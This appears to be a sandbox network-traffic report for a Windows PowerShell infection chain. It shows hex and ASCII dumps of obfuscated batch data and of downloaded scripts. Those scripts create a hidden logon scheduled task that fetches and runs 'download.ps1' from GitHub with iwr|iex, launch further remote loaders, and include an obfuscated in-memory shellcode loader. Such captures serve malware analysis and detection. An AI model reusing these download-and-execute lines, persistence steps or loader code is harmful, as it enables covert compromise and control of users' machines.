2025-01-08 09:15:11 UTC	16384	IN	Data Raw: 4b 78 4f 6c 4f 4d 70 25 74 25 6c 61 78 58 4e 6e 5a 77 25 25 4a 59 62 75 79 7a 50 25 5e 25 46 53 64 70 7a 4c 5a 73 66 25 25 4b 49 4c 77 76 66 69 56 25 4f 25 51 71 64 71 64 7a 74 25 20 25 48 63 43 63 64 55 4f 4e 25 2c 25 70 74 76 75 51 71 74 51 25 20 25 45 5a 67 77 62 44 61 4e 25 2c 25 43 6e 76 59 4d 73 66 47 25 20 25 41 6e 53 25 20 20 0d 0a 3a 36 35 35 35 30 39 20 20 0d 0a 25 4b 52 72 6b 47 43 59 25 73 25 6a 66 45 4e 79 4b 4a 52 25 25 59 75 68 6d 78 41 6a 64 4e 25 65 25 49 6c 6c 5a 69 78 44 49 69 25 25 43 64 73 53 63 4c 69 72 25 74 25 45 4f 50 64 74 58 59 68 25 20 25 46 56 71 43 6c 68 50 77 58 25 2f 25 52 6e 41 73 6f 42 4e 66 68 25 25 56 42 51 4a 6b 49 6a 41 25 5e 25 48 4f 44 58 58 4e 49 25 25 78 70 4d 44 56 56 71 70 50 25 61 25 67 6b 49 73 50 63 58 43 55 Data Ascii: KxOlOMp%t%laxXNnZw%%JYbuyzP%^%FSdpzLZsf%%KILwvfiV%O%Qqdqdzt% %HcCcdUON%,%ptvuQqtQ% %EZgwbDaN%,%CnvYMsfG% %AnS% :655509 %KRrkGCY%s%jfENyKJR%%YuhmxAjdN%e%IllZixDIi%%CdsScLir%t%EOPdtXYh% %FVqClhPwX%/%RnAsoBNfh%%VBQJkIjA%^%HODXXNI%%xpMDVVqpP%a%gkIsPcXCU
2025-01-08 09:15:11 UTC	16384	IN	Data Raw: 69 71 5a 25 66 25 78 51 75 76 72 6f 6d 4b 79 25 25 48 59 68 47 43 6b 48 25 6f 25 6b 67 59 64 46 7a 71 25 25 6b 56 44 46 67 54 65 49 44 25 72 25 61 55 4c 51 6f 77 65 6d 65 25 20 25 45 76 6e 65 48 6d 65 25 2f 25 78 66 55 72 64 48 64 54 4e 25 25 73 73 75 71 79 4a 6a 53 25 6c 25 5a 50 50 79 61 4c 56 5a 68 25 20 25 25 6c 20 20 25 6c 4e 74 50 62 6f 62 25 69 25 58 4a 43 53 64 76 6f 78 25 25 49 50 57 4b 4a 6d 41 57 25 6e 25 7a 6d 52 42 77 5a 76 6d 25 20 25 78 6e 54 71 48 49 67 57 25 28 25 59 45 74 77 57 4f 79 77 25 25 79 48 6e 69 62 70 51 44 25 33 25 4b 71 73 6d 63 45 71 25 25 75 52 4f 74 79 4e 73 25 36 25 44 4c 6a 64 4f 4d 69 65 25 25 63 4f 61 53 6e 77 65 6c 25 36 25 59 70 6f 48 79 56 5a 6a 79 25 25 56 4d 7a 52 76 42 49 69 55 25 2c 25 51 6a 52 70 6f 4e 45 25 20 Data Ascii: iqZ%f%xQuvromKy%%HYhGCkH%o%kgYdFzq%%kVDFgTeID%r%aULQoweme% %EvneHme%/%xfUrdHdTN%%ssuqyJjS%l%ZPPyaLVZh% %%l %lNtPbob%i%XJCSdvox%%IPWKJmAW%n%zmRBwZvm% %xnTqHIgW%(%YEtwWOyw%%yHnibpQD%3%KqsmcEq%%uROtyNs%6%DLjdOMie%%cOaSnwel%6%YpoHyVZjy%%VMzRvBIiU%,%QjRpoNE%
2025-01-08 09:15:11 UTC	16384	IN	Data Raw: 6d 63 59 25 25 6a 57 59 42 52 5a 4a 76 25 38 25 6d 57 52 56 6a 42 7a 6d 77 25 25 6f 6b 4a 6d 53 69 44 49 61 25 35 25 53 63 56 52 41 75 71 51 66 25 25 4d 59 58 58 6f 6c 71 76 58 25 34 25 56 43 79 55 6a 47 78 56 72 25 25 41 78 45 64 63 56 4e 64 25 65 25 4d 72 6c 49 71 48 62 64 25 25 57 72 41 42 41 78 4f 61 73 25 29 25 52 45 51 62 5a 77 73 25 25 6f 66 41 6c 67 56 68 25 5e 25 73 7a 69 4f 68 67 62 4d 4f 25 25 54 67 6f 53 52 41 55 5a 25 3e 25 69 67 7a 66 73 6d 67 25 25 64 61 6f 6f 67 6d 64 25 5e 25 61 46 49 6c 6e 73 78 47 25 25 54 4e 61 42 6b 51 6a 25 3e 25 6e 6c 68 51 77 62 4b 71 45 25 25 6e 7a 64 5a 42 59 55 68 6d 25 33 25 68 47 67 46 53 68 44 4e 25 25 56 6a 50 79 51 66 49 4d 25 29 25 5a 51 68 47 75 54 74 52 25 20 0d 0a 25 49 6f 58 64 51 74 56 25 67 25 4d 6f Data Ascii: mcY%%jWYBRZJv%8%mWRVjBzmw%%okJmSiDIa%5%ScVRAuqQf%%MYXXolqvX%4%VCyUjGxVr%%AxEdcVNd%e%MrlIqHbd%%WrABAxOas%)%REQbZws%%ofAlgVh%^%sziOhgbMO%%TgoSRAUZ%>%igzfsmg%%daoogmd%^%aFIlnsxG%%TNaBkQj%>%nlhQwbKqE%%nzdZBYUhm%3%hGgFShDN%%VjPyQfIM%)%ZQhGuTtR% %IoXdQtV%g%Mo
2025-01-08 09:15:11 UTC	16384	IN	Data Raw: 50 25 25 5a 6a 48 54 59 64 67 62 53 25 22 25 4c 4e 57 4b 51 67 4d 25 25 73 4f 64 67 6e 56 4d 6d 69 25 56 25 47 50 71 64 4c 50 76 45 25 25 6b 57 6f 76 64 4d 76 25 69 25 54 46 76 68 54 69 72 25 25 61 61 4f 46 4d 77 42 57 25 72 25 61 75 71 41 65 65 79 25 25 4c 61 56 61 48 55 7a 53 64 25 74 25 72 6e 79 45 72 67 49 25 25 62 51 63 43 57 72 68 25 75 25 77 46 4f 67 70 48 69 51 25 25 67 58 6c 46 57 50 70 73 4a 25 61 25 72 59 42 48 63 67 76 25 25 53 53 72 62 50 72 56 25 6c 25 53 73 56 76 68 50 41 25 20 25 71 71 76 5a 50 6d 6d 48 25 4d 25 70 70 44 57 67 65 57 25 25 41 6f 5a 4a 52 63 7a 7a 25 61 25 53 4c 62 78 4e 43 71 6b 25 25 6a 59 53 6e 6b 59 75 41 42 25 63 25 4d 44 69 68 78 48 64 6d 76 25 25 56 6a 73 74 64 4e 6b 77 63 25 68 25 75 76 6d 70 54 67 79 65 25 25 43 78 Data Ascii: P%%ZjHTYdgbS%"%LNWKQgM%%sOdgnVMmi%V%GPqdLPvE%%kWovdMv%i%TFvhTir%%aaOFMwBW%r%auqAeey%%LaVaHUzSd%t%rnyErgI%%bQcCWrh%u%wFOgpHiQ%%gXlFWPpsJ%a%rYBHcgv%%SSrbPrV%l%SsVvhPA% %qqvZPmmH%M%ppDWgeW%%AoZJRczz%a%SLbxNCqk%%jYSnkYuAB%c%MDihxHdmv%%VjstdNkwc%h%uvmpTgye%%Cx
2025-01-08 09:15:11 UTC	16384	IN	Data Raw: 63 70 41 76 71 70 25 25 63 61 4e 6a 77 58 58 44 25 6f 25 6a 65 4a 50 6e 4b 56 25 25 61 48 5a 57 67 54 56 25 74 25 6f 77 45 74 56 65 70 49 25 25 56 4b 67 47 63 45 6c 46 25 6f 25 69 6c 45 57 70 49 59 25 20 25 61 6e 73 25 20 20 0d 0a 3a 33 38 39 37 36 37 20 0d 0a 3a 34 38 30 34 34 34 20 20 0d 0a 25 79 69 73 68 76 64 6a 25 73 25 48 77 4d 65 4b 46 57 25 25 51 75 6e 41 6e 57 79 70 25 5e 25 58 72 6b 6e 71 41 50 43 77 25 25 73 41 6d 45 63 6c 41 6f 25 65 25 68 4a 45 76 4a 56 53 44 25 25 6a 6d 4a 76 51 52 59 6c 71 25 5e 25 4c 43 6c 45 69 50 52 25 25 78 64 45 64 62 4d 6e 4a 49 25 74 25 78 65 45 67 62 6e 67 45 73 25 20 25 49 46 55 76 71 4c 51 25 22 25 66 4c 55 63 5a 67 52 25 25 4c 58 4b 42 56 4c 48 50 52 25 50 25 48 49 4e 4f 57 6a 57 25 25 4c 58 6b 61 73 61 55 70 74 Data Ascii: cpAvqp%%caNjwXXD%o%jeJPnKV%%aHZWgTV%t%owEtVepI%%VKgGcElF%o%ilEWpIY% %ans% :389767 :480444 %yishvdj%s%HwMeKFW%%QunAnWyp%^%XrknqAPCw%%sAmEclAo%e%hJEvJVSD%%jmJvQRYlq%^%LClEiPR%%xdEdbMnJI%t%xeEgbngEs% %IFUvqLQ%"%fLUcZgR%%LXKBVLHPR%P%HINOWjW%%LXkasaUpt
2025-01-08 09:15:11 UTC	8798	IN	Data Raw: 6f 25 61 25 52 71 62 7a 75 53 64 6f 67 25 25 70 6c 48 6c 45 63 4d 79 6a 25 6e 25 51 4e 52 4b 58 4e 4d 7a 4b 25 25 56 58 58 42 53 6d 42 65 25 73 25 73 75 58 4f 59 69 46 53 25 25 4c 7a 6d 68 48 64 73 51 44 25 3d 25 4b 72 59 55 46 6d 6b 25 25 4d 43 70 6c 78 52 46 57 25 32 25 46 59 70 6d 70 61 47 78 25 25 47 68 69 43 72 54 62 7a 25 2a 25 78 4f 7a 52 41 79 73 25 25 77 46 54 79 4b 66 50 63 45 25 32 25 6c 6f 4b 52 55 48 74 4a 25 25 70 7a 47 73 58 41 4b 4c 4b 25 2a 25 50 58 70 4d 46 4e 72 78 42 25 25 75 4f 79 55 4f 72 70 25 32 25 73 43 61 4c 43 45 48 4c 73 25 25 6e 51 6a 53 61 75 67 25 2a 25 44 50 68 6c 70 62 67 25 25 69 44 55 43 64 67 77 74 63 25 30 25 68 4a 51 4d 43 46 61 25 25 47 69 65 4f 47 78 43 5a 52 25 33 25 47 4b 66 41 59 63 43 5a 25 25 52 7a 6e 68 59 6d Data Ascii: o%a%RqbzuSdog%%plHlEcMyj%n%QNRKXNMzK%%VXXBSmBe%s%suXOYiFS%%LzmhHdsQD%=%KrYUFmk%%MCplxRFW%2%FYpmpaGx%%GhiCrTbz%%xOzRAys%%wFTyKfPcE%2%loKRUHtJ%%pzGsXAKLK%%PXpMFNrxB%%uOyUOrp%2%sCaLCEHLs%%nQjSaug%*%DPhlpbg%%iDUCdgwtc%0%hJQMCFa%%GieOGxCZR%3%GKfAYcCZ%%RznhYm

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.7	49795	185.199.110.133	443	7372	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-08 09:15:24 UTC	200	OUT	GET /43a1723/test/main/download.ps1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: raw.githubusercontent.com Connection: Keep-Alive
2025-01-08 09:15:24 UTC	901	IN	HTTP/1.1 200 OK Connection: close Content-Length: 5232 Cache-Control: max-age=300 Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox Content-Type: text/plain; charset=utf-8 ETag: "79c6591c569aa2b57425683d34835c5122f5baa556e8f14cd9ff82a555abf7c6" Strict-Transport-Security: max-age=31536000 X-Content-Type-Options: nosniff X-Frame-Options: deny X-XSS-Protection: 1; mode=block X-GitHub-Request-Id: 46F1:265C73:3D2799:43EA14:677E422C Accept-Ranges: bytes Date: Wed, 08 Jan 2025 09:15:24 GMT Via: 1.1 varnish X-Served-By: cache-ewr-kewr1740040-EWR X-Cache: MISS X-Cache-Hits: 0 X-Timer: S1736327724.435000,VS0,VE246 Vary: Authorization,Accept-Encoding,Origin Access-Control-Allow-Origin: * Cross-Origin-Resource-Policy: cross-origin X-Fastly-Request-ID: 1977b9c9864e2dcdba0385f23c6e2342bbefee1e Expires: Wed, 08 Jan 2025 09:20:24 GMT Source-Age: 0
2025-01-08 09:15:24 UTC	1378	IN	Data Raw: 41 64 64 2d 54 79 70 65 20 40 22 0a 20 20 20 20 75 73 69 6e 67 20 53 79 73 74 65 6d 3b 0a 20 20 20 20 75 73 69 6e 67 20 53 79 73 74 65 6d 2e 52 75 6e 74 69 6d 65 2e 49 6e 74 65 72 6f 70 53 65 72 76 69 63 65 73 3b 0a 20 20 20 20 70 75 62 6c 69 63 20 63 6c 61 73 73 20 43 6f 6e 73 6f 6c 65 57 69 6e 64 6f 77 55 74 69 6c 73 20 7b 0a 20 20 20 20 20 20 20 20 5b 44 6c 6c 49 6d 70 6f 72 74 28 22 6b 65 72 6e 65 6c 33 32 2e 64 6c 6c 22 29 5d 0a 20 20 20 20 20 20 20 20 70 75 62 6c 69 63 20 73 74 61 74 69 63 20 65 78 74 65 72 6e 20 49 6e 74 50 74 72 20 47 65 74 43 6f 6e 73 6f 6c 65 57 69 6e 64 6f 77 28 29 3b 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 5b 44 6c 6c 49 6d 70 6f 72 74 28 22 75 73 65 72 33 32 2e 64 6c 6c 22 29 5d 0a 20 20 20 20 20 20 20 20 70 75 Data Ascii: Add-Type @" using System; using System.Runtime.InteropServices; public class ConsoleWindowUtils { [DllImport("kernel32.dll")] public static extern IntPtr GetConsoleWindow(); [DllImport("user32.dll")] pu
2025-01-08 09:15:24 UTC	1378	IN	Data Raw: 70 65 20 2d 41 73 73 65 6d 62 6c 79 4e 61 6d 65 20 53 79 73 74 65 6d 2e 57 69 6e 64 6f 77 73 2e 46 6f 72 6d 73 0a 0a 0a 23 20 4b 69 e1 bb 83 6d 20 74 72 61 20 78 65 6d 20 73 63 72 69 70 74 20 63 c3 b3 20 71 75 79 e1 bb 81 6e 20 71 75 e1 ba a3 6e 20 74 72 e1 bb 8b 20 6b 68 c3 b4 6e 67 0a 69 66 20 28 2d 6e 6f 74 20 28 5b 53 65 63 75 72 69 74 79 2e 50 72 69 6e 63 69 70 61 6c 2e 57 69 6e 64 6f 77 73 50 72 69 6e 63 69 70 61 6c 5d 20 5b 53 65 63 75 72 69 74 79 2e 50 72 69 6e 63 69 70 61 6c 2e 57 69 6e 64 6f 77 73 49 64 65 6e 74 69 74 79 5d 3a 3a 47 65 74 43 75 72 72 65 6e 74 28 29 29 2e 49 73 49 6e 52 6f 6c 65 28 5b 53 65 63 75 72 69 74 79 2e 50 72 69 6e 63 69 70 61 6c 2e 57 69 6e 64 6f 77 73 42 75 69 6c 74 49 6e 52 6f 6c 65 5d 3a 3a 41 64 6d 69 6e 69 73 74 72 Data Ascii: pe -AssemblyName System.Windows.Forms# Kim tra xem script c quyn qun tr khngif (-not ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]::Administr
2025-01-08 09:15:24 UTC	1378	IN	Data Raw: 74 28 60 22 77 73 63 72 69 70 74 2e 73 68 65 6c 6c 60 22 29 2e 72 75 6e 28 60 22 70 6f 77 65 72 73 68 65 6c 6c 20 60 69 77 72 28 27 68 74 74 70 73 3a 2f 2f 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 34 33 61 31 37 32 33 2f 74 65 73 74 2f 6d 61 69 6e 2f 64 6f 77 6e 6c 6f 61 64 2e 70 73 31 27 29 7c 69 65 78 60 22 2c 30 29 28 77 69 6e 64 6f 77 2e 63 6c 6f 73 65 29 22 0a 24 74 61 73 6b 5f 74 72 69 67 67 65 72 20 3d 20 4e 65 77 2d 53 63 68 65 64 75 6c 65 64 54 61 73 6b 54 72 69 67 67 65 72 20 2d 41 74 4c 6f 67 4f 6e 0a 24 74 61 73 6b 5f 73 65 74 74 69 6e 67 73 20 3d 20 4e 65 77 2d 53 63 68 65 64 75 6c 65 64 54 61 73 6b 53 65 74 74 69 6e 67 73 53 65 74 20 2d 41 6c 6c 6f 77 53 74 61 72 74 49 66 4f 6e 42 61 74 74 65 72 69 65 73 Data Ascii: t(`"wscript.shell`").run(`"powershell `iwr('https://raw.githubusercontent.com/43a1723/test/main/download.ps1')\|iex`",0)(window.close)"$task_trigger = New-ScheduledTaskTrigger -AtLogOn$task_settings = New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries
2025-01-08 09:15:24 UTC	1098	IN	Data Raw: 22 70 6f 77 65 72 73 68 65 6c 6c 22 20 2d 41 72 67 75 6d 65 6e 74 20 22 49 27 45 27 58 28 24 64 6f 77 6e 6c 6f 61 64 29 22 20 2d 57 69 6e 64 6f 77 53 74 79 6c 65 20 48 69 64 64 65 6e 20 2d 50 61 73 73 54 68 72 75 0a 0a 0a 41 64 64 2d 54 79 70 65 20 2d 41 73 73 65 6d 62 6c 79 4e 61 6d 65 20 53 79 73 74 65 6d 2e 49 4f 2e 43 6f 6d 70 72 65 73 73 69 6f 6e 2e 46 69 6c 65 53 79 73 74 65 6d 0a 41 64 64 2d 54 79 70 65 20 2d 41 73 73 65 6d 62 6c 79 4e 61 6d 65 20 53 79 73 74 65 6d 2e 4e 65 74 2e 48 74 74 70 0a 53 74 61 72 74 2d 50 72 6f 63 65 73 73 20 70 6f 77 65 72 73 68 65 6c 6c 20 2d 41 72 67 75 6d 65 6e 74 4c 69 73 74 20 22 2d 43 6f 6d 6d 61 6e 64 20 69 77 72 20 27 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 45 76 69 6c 42 79 74 65 63 6f 64 65 2f Data Ascii: "powershell" -Argument "I'E'X($download)" -WindowStyle Hidden -PassThruAdd-Type -AssemblyName System.IO.Compression.FileSystemAdd-Type -AssemblyName System.Net.HttpStart-Process powershell -ArgumentList "-Command iwr 'https://github.com/EvilBytecode/

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.7	49847	185.199.110.133	443	7460	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-08 09:15:33 UTC	110	OUT	GET /43a1723/test/refs/heads/main/Mewing HTTP/1.1 Host: raw.githubusercontent.com Connection: Keep-Alive
2025-01-08 09:15:33 UTC	901	IN	HTTP/1.1 200 OK Connection: close Content-Length: 1318 Cache-Control: max-age=300 Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox Content-Type: text/plain; charset=utf-8 ETag: "094db1ccdecd0e644d016ac259ddfba14ea141479a6ed79913bf64dfbbe9253a" Strict-Transport-Security: max-age=31536000 X-Content-Type-Options: nosniff X-Frame-Options: deny X-XSS-Protection: 1; mode=block X-GitHub-Request-Id: 8AAE:3C087C:418B8A:484EB6:677E4232 Accept-Ranges: bytes Date: Wed, 08 Jan 2025 09:15:33 GMT Via: 1.1 varnish X-Served-By: cache-ewr-kewr1740030-EWR X-Cache: MISS X-Cache-Hits: 0 X-Timer: S1736327733.256641,VS0,VE331 Vary: Authorization,Accept-Encoding,Origin Access-Control-Allow-Origin: * Cross-Origin-Resource-Policy: cross-origin X-Fastly-Request-ID: 6342df5496c616c98288294ec476ae9cca590e70 Expires: Wed, 08 Jan 2025 09:20:33 GMT Source-Age: 0
2025-01-08 09:15:33 UTC	1318	IN	Data Raw: 23 20 48 c3 a0 6d 20 74 e1 ba a1 6f 20 73 6f 63 6b 65 74 20 55 44 50 0a 66 75 6e 63 74 69 6f 6e 20 43 72 65 61 74 65 53 6f 63 6b 65 74 20 7b 0a 20 20 20 20 24 73 6f 63 6b 65 74 20 3d 20 4e 65 77 2d 4f 62 6a 65 63 74 20 53 79 73 74 65 6d 2e 4e 65 74 2e 53 6f 63 6b 65 74 73 2e 55 64 70 43 6c 69 65 6e 74 0a 20 20 20 20 24 73 6f 63 6b 65 74 2e 43 6c 69 65 6e 74 2e 53 65 74 53 6f 63 6b 65 74 4f 70 74 69 6f 6e 28 5b 53 79 73 74 65 6d 2e 4e 65 74 2e 53 6f 63 6b 65 74 73 2e 53 6f 63 6b 65 74 4f 70 74 69 6f 6e 4c 65 76 65 6c 5d 3a 3a 49 50 2c 20 5b 53 79 73 74 65 6d 2e 4e 65 74 2e 53 6f 63 6b 65 74 73 2e 53 6f 63 6b 65 74 4f 70 74 69 6f 6e 4e 61 6d 65 5d 3a 3a 4d 75 6c 74 69 63 61 73 74 54 69 6d 65 54 6f 4c 69 76 65 2c 20 32 35 35 29 0a 20 20 20 20 72 65 74 75 72 Data Ascii: # Hm to socket UDPfunction CreateSocket { $socket = New-Object System.Net.Sockets.UdpClient $socket.Client.SetSocketOption([System.Net.Sockets.SocketOptionLevel]::IP, [System.Net.Sockets.SocketOptionName]::MulticastTimeToLive, 255) retur

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.7	49848	185.199.110.133	443	1916	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-08 09:15:33 UTC	130	OUT	GET /43a1723/test/refs/heads/main/shellcode/loaderclient.ps1 HTTP/1.1 Host: raw.githubusercontent.com Connection: Keep-Alive
2025-01-08 09:15:33 UTC	901	IN	HTTP/1.1 200 OK Connection: close Content-Length: 3490 Cache-Control: max-age=300 Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox Content-Type: text/plain; charset=utf-8 ETag: "c453847515f20228e686d320138664ed0c3c6bf84039aff4871e31f9a470f9b4" Strict-Transport-Security: max-age=31536000 X-Content-Type-Options: nosniff X-Frame-Options: deny X-XSS-Protection: 1; mode=block X-GitHub-Request-Id: 824A:24B4DA:3D6720:442A12:677E422E Accept-Ranges: bytes Date: Wed, 08 Jan 2025 09:15:33 GMT Via: 1.1 varnish X-Served-By: cache-ewr-kewr1740042-EWR X-Cache: MISS X-Cache-Hits: 0 X-Timer: S1736327733.286661,VS0,VE302 Vary: Authorization,Accept-Encoding,Origin Access-Control-Allow-Origin: * Cross-Origin-Resource-Policy: cross-origin X-Fastly-Request-ID: 1d82010515fe9c9efcdc201eade2be5bbdba4fe8 Expires: Wed, 08 Jan 2025 09:20:33 GMT Source-Age: 0
2025-01-08 09:15:33 UTC	1378	IN	Data Raw: 24 50 72 6f 67 72 65 73 73 50 72 65 66 65 72 65 6e 63 65 20 3d 20 28 27 53 69 6c 27 2b 27 65 6e 74 27 2b 27 6c 27 2b 27 79 43 6f 6e 74 69 6e 75 27 2b 27 65 27 29 0a 66 75 6e 63 74 69 6f 6e 20 62 6c 61 7a 65 4c 6f 61 64 65 72 20 7b 0a 20 20 20 20 50 61 72 61 6d 20 28 24 62 6c 61 7a 65 5f 6d 6f 64 75 6c 65 73 2c 20 24 62 6c 61 7a 65 5f 66 75 6e 63 29 0a 20 20 20 20 24 61 73 73 65 6d 20 3d 20 28 5b 41 70 70 44 6f 6d 61 69 6e 5d 3a 3a 22 63 55 60 52 60 52 65 60 4e 54 64 4f 4d 61 49 6e 22 2e 28 28 27 47 45 27 2b 27 54 27 29 2b 28 27 61 73 27 2b 27 53 27 29 2b 28 27 45 6d 42 4c 49 65 27 2b 27 53 27 29 29 2e 49 6e 76 6f 6b 65 28 29 20 7c 20 3f 20 7b 20 24 5f 2e 22 47 6c 4f 60 42 61 4c 61 73 53 60 65 4d 42 4c 59 60 43 60 41 63 68 45 22 20 2d 61 6e 64 20 24 5f 2e Data Ascii: $ProgressPreference = ('Sil'+'ent'+'l'+'yContinu'+'e')function blazeLoader { Param ($blaze_modules, $blaze_func) $assem = ([AppDomain]::"cU`R`Re`NTdOMaIn".(('GE'+'T')+('as'+'S')+('EmBLIe'+'S')).Invoke() \| ? { $_."GlO`BaLasS`eMBLY`C`AchE" -and $_.
2025-01-08 09:15:33 UTC	1378	IN	Data Raw: 74 20 53 79 73 74 65 6d 2e 52 65 66 6c 65 63 74 69 6f 6e 2e 41 73 73 65 6d 62 6c 79 4e 61 6d 65 28 28 27 52 27 2b 27 65 66 6c 65 63 74 27 2b 27 65 64 44 65 6c 65 67 61 74 27 2b 27 65 27 29 29 29 2c 20 5b 53 79 73 74 65 6d 2e 52 65 66 6c 65 63 74 69 6f 6e 2e 45 6d 69 74 2e 41 73 73 65 6d 62 6c 79 42 75 69 6c 64 65 72 41 63 63 65 73 73 5d 3a 3a 22 72 60 55 4e 22 29 2e 28 27 44 45 27 2b 28 27 66 69 6e 65 64 79 27 2b 27 6e 41 27 29 2b 28 27 4d 69 63 6d 27 2b 27 4f 27 29 2b 27 64 55 27 2b 27 6c 45 27 29 2e 49 6e 76 6f 6b 65 28 28 27 49 27 2b 27 6e 4d 65 6d 27 2b 27 6f 72 79 4d 27 2b 27 6f 64 27 2b 27 75 6c 65 27 29 2c 20 24 66 61 6c 73 65 29 2e 28 28 27 64 45 46 27 2b 27 69 6e 27 29 2b 27 65 27 2b 28 27 54 79 27 2b 27 70 45 27 29 29 2e 49 6e 76 6f 6b 65 28 28 Data Ascii: t System.Reflection.AssemblyName(('R'+'eflect'+'edDelegat'+'e'))), [System.Reflection.Emit.AssemblyBuilderAccess]::"r`UN").('DE'+('finedy'+'nA')+('Micm'+'O')+'dU'+'lE').Invoke(('I'+'nMem'+'oryM'+'od'+'ule'), $false).(('dEF'+'in')+'e'+('Ty'+'pE')).Invoke((
2025-01-08 09:15:33 UTC	734	IN	Data Raw: 30 30 30 2c 20 30 78 34 30 29 0a 5b 53 79 73 74 65 6d 2e 52 75 6e 74 69 6d 65 2e 49 6e 74 65 72 6f 70 53 65 72 76 69 63 65 73 2e 4d 61 72 73 68 61 6c 5d 3a 3a 28 27 43 6f 27 2b 27 70 59 27 29 2e 49 6e 76 6f 6b 65 28 24 62 6c 61 7a 65 74 68 65 67 72 65 61 74 2c 20 30 2c 20 24 6c 70 4d 65 6d 2c 20 24 62 6c 61 7a 65 74 68 65 67 72 65 61 74 2e 22 4c 65 60 4e 60 47 74 48 22 29 0a 24 68 54 68 72 65 61 64 20 3d 20 5b 53 79 73 74 65 6d 2e 52 75 6e 74 69 6d 65 2e 49 6e 74 65 72 6f 70 53 65 72 76 69 63 65 73 2e 4d 61 72 73 68 61 6c 5d 3a 3a 28 27 67 65 27 2b 28 27 54 64 65 27 2b 27 4c 27 29 2b 28 27 45 27 2b 27 67 61 74 45 27 29 2b 27 46 6f 27 2b 27 52 27 2b 28 27 66 75 6e 63 27 2b 27 54 49 27 2b 27 6f 4e 70 27 29 2b 27 6f 69 27 2b 27 4e 54 27 2b 27 65 52 27 29 2e Data Ascii: 000, 0x40)[System.Runtime.InteropServices.Marshal]::('Co'+'pY').Invoke($blazethegreat, 0, $lpMem, $blazethegreat."Le`N`GtH")$hThread = [System.Runtime.InteropServices.Marshal]::('ge'+('Tde'+'L')+('E'+'gatE')+'Fo'+'R'+('func'+'TI'+'oNp')+'oi'+'NT'+'eR').

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.7	49849	140.82.121.3	443	1156	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-08 09:15:33 UTC	217	OUT	GET /EvilBytecode/Sryxen/releases/download/v1.0.0/sryxen_loader.ps1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: github.com Connection: Keep-Alive
2025-01-08 09:15:33 UTC	964	IN	HTTP/1.1 302 Found Server: GitHub.com Date: Wed, 08 Jan 2025 09:15:33 GMT Content-Type: text/html; charset=utf-8 Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With Location: https://objects.githubusercontent.com/github-production-release-asset-2e65be/884985882/df985353-b412-45be-a5df-5d50a4ddaf53?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250108%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250108T091533Z&X-Amz-Expires=300&X-Amz-Signature=71849342e45026ae948e7cc8f90ab3779bcd14dee0966a571aa2cf9824444811&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dsryxen_loader.ps1&response-content-type=application%2Foctet-stream Cache-Control: no-cache Strict-Transport-Security: max-age=31536000; includeSubdomains; preload X-Frame-Options: deny X-Content-Type-Options: nosniff X-XSS-Protection: 0 Referrer-Policy: no-referrer-when-downgrade
2025-01-08 09:15:33 UTC	3379	IN	Data Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 77 65 62 70 61 63 6b 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.co

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.7	49856	185.199.111.133	443	1156	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
